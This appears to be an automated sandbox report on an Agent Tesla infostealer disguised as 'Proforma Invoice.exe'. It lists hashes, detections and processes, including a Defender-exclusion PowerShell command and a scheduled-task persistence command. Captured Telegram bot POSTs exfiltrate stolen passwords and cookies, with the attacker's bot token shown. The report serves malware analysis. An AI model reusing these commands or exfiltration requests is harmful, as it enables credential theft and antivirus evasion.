                                                                                                  SHA-512:FFFCED8D8B7353DDDE9174C6186ED86AAFA00F53899ADD70C290BB1C0CF6113A9560E1322E22AC56748E4DB9228FC607B8454CC1A6F351C4F0C5420EEF5140F4
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="System.Windows.Forms.ToolStripSettings.VW.gs.toolStripConnectionGui" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <System.Windows.Forms.ToolStripSettings.VW.gs.toolStripConnectionGui>.. <setting name="ItemOrder" serializeAs="String">.. <value />.. </setting>.. <setting name="IsDefault" serializeAs="String">.. <value>False</value>.. </setting>.. <setting name="Size" serializeAs="String">.. <value>80,
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6951152985249047
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                  MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                  SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                  SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                  SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):901120
                                                                                                  Entropy (8bit):7.517387623724626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:5UUGN9KWB4EsWm1gemIojjm9kGwW0TdepTp6eBbHsO8v+L98JxGQaEiSoQHljtGY:fWBfIFEK0ToxWOM+L213sNa
                                                                                                  MD5:BEA52E8910C076F5720AC20970E48A10
                                                                                                  SHA1:42777245A3F79EA5B2BCF1EA48811111B1CC3529
                                                                                                  SHA-256:8D5F8190EC870DB510D2B95B830A07BF3C67D9996DF775778DFA82B6C2BDD7B3
                                                                                                  SHA-512:9CED8C19A96F0200C940300C1D28C087AC3342F930458BCD7DD6F8396147366DC1B244F06C2031D7C8AB1B10828C0D2BC177C952146E929D9F34A477E156AAFF
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5835
                                                                                                  Entropy (8bit):5.378528655382153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZJTL5NyqDo1Z5ZRTL5NyqDo1ZLAG4jZ+TL5NyqDo1ZJRIIgZf:R
                                                                                                  MD5:70815EBE804F753B9A677BB1E25137DD
                                                                                                  SHA1:7FC1233A605DFBD079501B510C2087A49B984A7A
                                                                                                  SHA-256:1CA6785BBCA9AEEAEF78064E96E64841058DC04F131C3E5DA187795CC4B55246
                                                                                                  SHA-512:F900B7881BFDA6F994B833D835512C21F0D4380230D293D460459E33F74ACA96512F4D52C2734C6283AF1FA4783D177F24593385D992EB9CFA5B01F493694D61
                                                                                                  Malicious:false
Preview:
**********************
Windows PowerShell transcript start
Start time: 20220718102446
Username: computer\user
RunAs User: computer\user
Configuration Name:
Machine: 287400 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Process ID: 2936
PSVersion: 5.1.17134.1
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
BuildVersion: 10.0.17134.1
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20220718102446
**********************
PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
**********************
Windows PowerShell transcript start
Start time: 20220718102918
Username: computer\user
RunAs Use
                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.517387623724626
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:Proforma Invoice.exe
                                                                                                  File size:901120
                                                                                                  MD5:bea52e8910c076f5720ac20970e48a10
                                                                                                  SHA1:42777245a3f79ea5b2bcf1ea48811111b1cc3529
                                                                                                  SHA256:8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
                                                                                                  SHA512:9ced8c19a96f0200c940300c1d28c087ac3342f930458bcd7dd6f8396147366dc1b244f06c2031d7c8ab1b10828c0d2bc177c952146e929d9f34a477e156aaff
                                                                                                  SSDEEP:12288:5UUGN9KWB4EsWm1gemIojjm9kGwW0TdepTp6eBbHsO8v+L98JxGQaEiSoQHljtGY:fWBfIFEK0ToxWOM+L213sNa
                                                                                                  TLSH:0615F12AFF25CE66C2185B36C4F70B44177446768312EF8F2BF451A82D133AB2D86AD5
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.b..............0.................. ........@.. ....................... ............@................................
                                                                                                  Icon Hash:142b5cd6d6184310
                                                                                                  Entrypoint:0x4dc5de
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x62CD21F9 [Tue Jul 12 07:25:45 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc590 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xde000 | 0x1514 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xda5e4 | 0xda600 | False | 0.8210861476817402 | data | 7.524828218449115 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xde000 | 0x1514 | 0x1600 | False | 0.708984375 | data | 6.729702530740709 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xde130 | 0xecf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xdf000 | 0x14 | data | |
RT_VERSION | 0xdf014 | 0x314 | data | |
RT_MANIFEST | 0xdf328 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/18/22-10:25:15.675809 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 18, 2022 10:25:14.158590078 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:14.158643007 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:14.158837080 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:14.265738964 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:14.265777111 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:14.336097002 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:14.336405993 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:14.341516018 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:14.341531992 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:14.341778040 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:14.429742098 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:15.644831896 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:15.672501087 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:15.675651073 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:15.716495037 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:15.812889099 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:15.813043118 CEST | 443 | 49781 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:15.813143969 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:15.814522982 CEST | 49781 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:18.829792976 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:18.829880953 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:18.830013990 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:18.830478907 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:18.830501080 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:18.895765066 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:18.952868938 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:19.056626081 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:19.056664944 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:19.090744019 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:19.091398954 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:19.091489077 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:19.267921925 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:19.268026114 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Jul 18, 2022 10:25:19.268147945 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Jul 18, 2022 10:25:19.283899069 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 18, 2022 10:25:14.116041899 CEST5655053192.168.2.68.8.8.8
                                                                                                  Jul 18, 2022 10:25:14.133363008 CEST53565508.8.8.8192.168.2.6
                                                                                                  Jul 18, 2022 10:25:18.808872938 CEST5987153192.168.2.68.8.8.8
                                                                                                  Jul 18, 2022 10:25:18.828447104 CEST53598718.8.8.8192.168.2.6
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jul 18, 2022 10:25:14.116041899 CEST192.168.2.68.8.8.80x7c8bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                  Jul 18, 2022 10:25:18.808872938 CEST192.168.2.68.8.8.80xfae3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jul 18, 2022 10:25:14.133363008 CEST8.8.8.8192.168.2.60x7c8bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                  Jul 18, 2022 10:25:18.828447104 CEST8.8.8.8192.168.2.60xfae3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
• api.telegram.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49781 | 149.154.167.220 | 443 | C:\Users\user\Desktop\Proforma Invoice.exe

Timestamp | kBytes transferred | Direction | Data
2022-07-18 08:25:15 UTC | 0 | OUT | POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48
Host: api.telegram.org
Content-Length: 1022
Expect: 100-continue
Connection: Keep-Alive
2022-07-18 08:25:15 UTC | 0 | IN | HTTP/1.1 100 Continue
                                                                                                  2022-07-18 08:25:15 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 63 31 63 63 35 35 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 35 39 35 33 31 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 63 31 63 63 35 35 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 37 34 30 30 0a 4f 53 46
                                                                                                  Data Ascii: -----------------------------8da68ac1cc55b48Content-Disposition: form-data; name="chat_id"5359531870-----------------------------8da68ac1cc55b48Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/287400OSF
2022-07-18 08:25:15 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 18 Jul 2022 08:25:15 GMT
Content-Type: application/json
Content-Length: 638
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  {"ok":true,"result":{"message_id":524,"from":{"id":5573921253,"is_bot":true,"first_name":"Johnero","username":"Johnerobot"},"chat":{"id":5359531870,"first_name":"Reuben","last_name":"Eric","username":"Wirewire101","type":"private"},"date":1658132715,"document":{"file_name":"user-287400 2022-07-18 10-55-48.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAICDGLVGOvRTphAugKhCRikmDnIPpSLAAKVCwACpVaoUseqfWJ_Fiv3KQQ","file_unique_id":"AgADlQsAAqVWqFI","file_size":446},"caption":"New PW Recovered!\n\nUser Name: user/287400\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49785 | 149.154.167.220 | 443 | C:\Users\user\Desktop\Proforma Invoice.exe

Timestamp | kBytes transferred | Direction | Data
2022-07-18 08:25:19 UTC | 2 | OUT | POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8da68ad9679701f
Host: api.telegram.org
Content-Length: 1900
Expect: 100-continue
2022-07-18 08:25:19 UTC | 2 | IN | HTTP/1.1 100 Continue
                                                                                                  2022-07-18 08:25:19 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 64 39 36 37 39 37 30 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 35 39 35 33 31 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 64 39 36 37 39 37 30 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 37 34 30 30
                                                                                                  Data Ascii: -----------------------------8da68ad9679701fContent-Disposition: form-data; name="chat_id"5359531870-----------------------------8da68ad9679701fContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/287400
                                                                                                  2022-07-18 08:25:19 UTC3OUTData Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5
                                                                                                  Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
2022-07-18 08:25:19 UTC | 4 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 18 Jul 2022 08:25:19 GMT
Content-Type: application/json
Content-Length: 648
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  {"ok":true,"result":{"message_id":525,"from":{"id":5573921253,"is_bot":true,"first_name":"Johnero","username":"Johnerobot"},"chat":{"id":5359531870,"first_name":"Reuben","last_name":"Eric","username":"Wirewire101","type":"private"},"date":1658132719,"document":{"file_name":"user-287400 2022-07-18 11-05-53.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAICDWLVGO8D0eEMY6XVwdN3u79eJVKRAAKWCwACpVaoUh-zNYjMnZtrKQQ","file_unique_id":"AgADlgsAAqVWqFI","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/287400\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}



Target ID: 0
Start time: 10:24:31
Start date: 18/07/2022
Path: C:\Users\user\Desktop\Proforma Invoice.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Proforma Invoice.exe"
Imagebase: 0x4c0000
File size: 901120 bytes
MD5 hash: BEA52E8910C076F5720AC20970E48A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 4
Start time: 10:24:43
Start date: 18/07/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Imagebase: 0xf10000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 5
Start time: 10:24:43
Start date: 18/07/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6406f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 6
Start time: 10:24:44
Start date: 18/07/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Imagebase: 0xce0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 7
Start time: 10:24:45
Start date: 18/07/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6406f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 8
Start time: 10:24:48
Start date: 18/07/2022
Path: C:\Users\user\Desktop\Proforma Invoice.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Proforma Invoice.exe
Imagebase: 0xbd0000
File size: 901120 bytes
MD5 hash: BEA52E8910C076F5720AC20970E48A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
